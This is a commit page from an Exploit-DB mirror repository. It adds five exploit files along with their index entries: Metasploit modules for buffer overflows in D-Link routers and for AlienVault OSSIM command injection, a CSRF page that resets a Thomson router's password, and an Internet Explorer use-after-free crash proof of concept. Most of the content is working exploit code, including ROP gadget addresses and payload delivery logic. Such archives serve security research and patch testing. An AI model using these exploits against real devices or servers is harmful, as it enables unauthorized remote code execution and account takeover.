bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_26_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-26 04:37:14 +00:00
parent 3e99626f23
commit c28dbf00b0
6 changed files with 514 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -30497,3 +30497,8 @@ id,file,description,date,author,platform,type,port
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0
33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free (MS14-035) - Crash PoC",2014-06-24,"Drozdova Liudmila",windows,dos,0
33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80
33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0

Can't render this file because it is too large.

132
platforms/hardware/remote/33862.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link authentication.cgi Buffer Overflow',
'Description' => %q{
This module exploits an remote buffer overflow vulnerability on several D-Link routers.
The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
long password values. The vulnerability can be exploitable without authentication. This
module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
},
'Author' =>
[
'Roberto Paleari', # Vulnerability discovery
'Craig Heffner', # also discovered the vulnerability / help with some parts of this module
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'References' =>
[
['OSVDB', '95951'],
['EDB', '27283'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'], #advisory on vendor web site
['URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'], #vendor web site of router
['URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt'] #original advisory
],
'Targets' =>
[
[ 'D-Link DIR-645 1.03',
{
'Offset' => 1011,
'LibcBase' => 0x2aaf8000, #Router
#'LibcBase' => 0x40854000, # QEMU environment
'System' => 0x000531FF, # address of system
'CalcSystem' => 0x000158C8, # calculate the correct address of system
'CallSystem' => 0x000159CC, # call our system
}
]
],
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
end
def check
begin
res = send_request_cgi({
'uri' => "/authentication.cgi",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:linemax => 200,
:concat_operator => " && "
)
end
def prepare_shellcode(cmd)
shellcode = rand_text_alpha_upper(target['Offset']) # padding
shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
# .text:000159D0 21 28 60 02 move $a1, $s3 # not used
# .text:000159D4 21 30 20 02 move $a2, $s1 # not used
# .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system
# .text:000159DC 09 F8 20 03 jalr $t9 # call system
# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
shellcode << rand_text_alpha_upper(16) # filler in front of our command
shellcode << cmd
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
uid = rand_text_alpha(4)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/authentication.cgi",
'cookie' => "uid=#{uid}",
'encode_params' => false,
'vars_post' => {
'uid' => uid,
'password' => rand_text_alpha(3) + shellcode,
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

130
platforms/hardware/remote/33863.rb Executable file
View file

@ -0,0 +1,130 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link hedwig.cgi Buffer Overflow in Cookie Header',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on several D-Link
routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with
long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600
and the DIR645A1_FW103B11 firmware.
},
'Author' =>
[
'Roberto Paleari', # Vulnerability discovery
'Craig Heffner', # also discovered the vulnerability / help with some parts of this exploit
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '95950'],
['EDB', '27283'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'], #advisory on vendor web site
['URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'], #vendor web site of router
['URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt'] #original advisory
],
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
[ 'Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600',
{
'Offset' => 973,
'LibcBase' => 0x2aaf8000, # Router
#'LibcBase' => 0x40854000, # QEMU environment
'System' => 0x000531FF, # address of system
'CalcSystem' => 0x000158C8, # calculate the correct address of system
'CallSystem' => 0x000159CC, # call our system
}
]
],
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
end
def check
begin
res = send_request_cgi({
'uri' => "/hedwig.cgi",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /unsupported HTTP request/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:linemax => 200,
:concat_operator => " && "
)
end
def prepare_shellcode(cmd)
shellcode = rand_text_alpha_upper(target['Offset']) # padding
shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
# .text:000159D0 21 28 60 02 move $a1, $s3 # not used
# .text:000159D4 21 30 20 02 move $a2, $s1 # not used
# .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system
# .text:000159DC 09 F8 20 03 jalr $t9 # call system
# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
shellcode << rand_text_alpha_upper(16) # filler in front of our command
shellcode << cmd
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/hedwig.cgi",
'cookie' => "uid=#{shellcode}",
'encode_params' => false,
'vars_post' => {
rand_text_alpha(4) => rand_text_alpha(4)
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

22
platforms/hardware/webapps/33866.html Executable file
View file

@ -0,0 +1,22 @@
#Author: nopesled
#Date: 24/06/14
#Vulnerability: POST Password Reset CSRF
#Tested on: Thomson TWG87OUIR (Hardware Version)
<html>
<head>
<title>Thomson TWG87OUIR CSRF</title>
</head>
<body>
<form name="exploit" method="post"
action="http://192.168.0.1/goform/RgSecurity">
<input type="hidden" name="HttpUserId" value="" />
<input type="hidden" name="Password" value="newpass" />
<input type="hidden" name="PasswordReEnter" value="newpass" />
<input type="hidden" name="RestoreFactoryNo" value-="0x00" />
</form>
<script type="text/javascript">
document.exploit.submit();
</script>
</body>
</html>

140
platforms/linux/remote/33865.rb Executable file
View file

@ -0,0 +1,140 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'AlienVault OSSIM av-centerd Command Injection',
'Description' => %q{
This module exploits a code execution flaw in AlienVault 4.6.1 and
prior. The vulnerability exists in the av-centerd SOAP web service,
where the update_system_info_debian_package method uses perl backticks
in an insecure way, allowing command injection. This module has been
tested successfully on AlienVault 4.6.0.
},
'Author' =>
[
'Unknown', # From HP ZDI team, Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3804'],
['BID', '67999'],
['ZDI', '14-202'],
['URL', 'http://forums.alienvault.com/discussion/2690']
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
#'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultOptions' =>
{
'SSL' => true
},
'Targets' =>
[
[ 'AlienVault <= 4.6.1', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 5 2014'))
register_options(
[
Opt::RPORT(40007)
], self.class)
end
def check
version = ""
res = send_soap_request("get_dpkg")
if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1
end
if version.empty? || version >= "4.7.0"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def exploit
send_soap_request("update_system_info_debian_package", 1)
end
def build_soap_request(method)
xml = Document.new
xml.add_element(
"soap:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:soapenc' => "http://schemas.xmlsoap.org/soap/encoding/",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'soap:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/",
'xmlns:soap' => "http://schemas.xmlsoap.org/soap/envelope/"
})
body = xml.root.add_element("soap:Body")
m = body.add_element(
method,
{
'xmlns' => "AV/CC/Util"
})
args = []
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
(0..3).each { |i| args[i].text = rand_text_alpha(4 + rand(4)) }
if method == "update_system_info_debian_package"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[4].text = "#{rand_text_alpha(4 + rand(4))}"
args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
end
xml.to_s
end
def send_soap_request(method, timeout = 20)
soap = build_soap_request(method)
res = send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)
res
end
end

85
platforms/windows/dos/33860.html Executable file
View file

@ -0,0 +1,85 @@
<!--
Exploit Title: MS14-035 Internet Explorer CInput Use-after-free POC
Product: Internet Explorer
Vulnerable version: 8,9,10
Date: 23.06.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Window 7 SP1 x86 IE 8,9,10
CVE : unknown
-->
<html>
<head><title>MS14-035 Internet Explorer CInput Use-after-free POC</title></head>
<body>
<form id="testfm">
<textarea id="child" value="a1" ></textarea>
<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
<textarea id="child3" value="a2" ></textarea>
<input type="text" name="test1">
</form>
<script>
var startfl=false;
function changer() {
// Call of changer function will happen inside mshtml!CFormElement::DoReset call, after execution of this function crash in DoReset will happen when accessing freed CInput element
if (startfl) {
document.getElementById("testfm").innerHTML = ""; // Destroy form contents, free next CInput in DoReset
CollectGarbage();
}
}
document.getElementById("child2").checked = true;
document.getElementById("child2").onpropertychange=changer;
startfl = true;
document.getElementById("testfm").reset(); // DoReset call
</script>
</body>
</html>
<!--
Crash details
(fd4.d84): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=6a5c0704 ebx=0556b358 ecx=081c2848 edx=00000004 esi=081c2848 edi=00000002
eip=00000000 esp=025bce94 ebp=025bceb4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
00000000 ?? ???
0:004> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
025bce90 6a5d1742 091ac108 00001200 6aafcb54 0x0
025bceb4 6a733150 0556b358 091ac108 6a73311d mshtml!CFormElement::DoReset+0xea
025bced0 6a7ef10b 0556b358 091ac108 0363d298 mshtml!Method_void_void+0x75
025bcf44 6a7fa6c6 0556b358 000003f2 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
025bcf94 6a81738a 0556b358 000003f2 00000001 mshtml!CElement::ContextInvokeEx+0x9d
025bcfd0 6a79bc0e 0556b358 000003f2 00000001 mshtml!CFormElement::VersionedInvokeEx+0xf0
025bd024 6c38a26e 0363d838 000003f2 00000001 mshtml!PlainInvokeEx+0xeb
025bd060 6c38a1b9 08968530 000003f2 00000409 jscript!IDispatchExInvokeEx2+0x104
025bd09c 6c38a43a 08968530 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
025bd15c 6c38a4e4 000003f2 00000001 00000000 jscript!InvokeDispatchEx+0x98
025bd190 6c39d9a8 08968530 025bd1c4 00000001 jscript!VAR::InvokeByName+0x139
025bd1dc 6c39da4f 08968530 00000001 00000000 jscript!VAR::InvokeDispName+0x7d
025bd208 6c39e4c7 08968530 00000000 00000001 jscript!VAR::InvokeByDispID+0xce
025bd3a4 6c395d7d 025bd3bc 025bd500 0113ca98 jscript!CScriptRuntime::Run+0x2b80
025bd48c 6c395cdb 025bd500 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xce
025bd4d4 6c395ef1 025bd500 00000000 00000000 jscript!ScrFncObj::Call+0x8d
025bd550 6c39620a 0113ca98 025bd710 00000000 jscript!CSession::Execute+0x15f
025bd59c 6c39c3b9 08987c70 025bd710 025bd720 jscript!COleScript::ExecutePendingScripts+0x1bd
025bd600 6c39c1d1 08987c70 002d346c 6a75f7b0 jscript!COleScript::ParseScriptTextCore+0x2a4
025bd628 6a75f774 08987c74 03dc016c 002d346c jscript!COleScript::ParseScriptText+0x30
--!>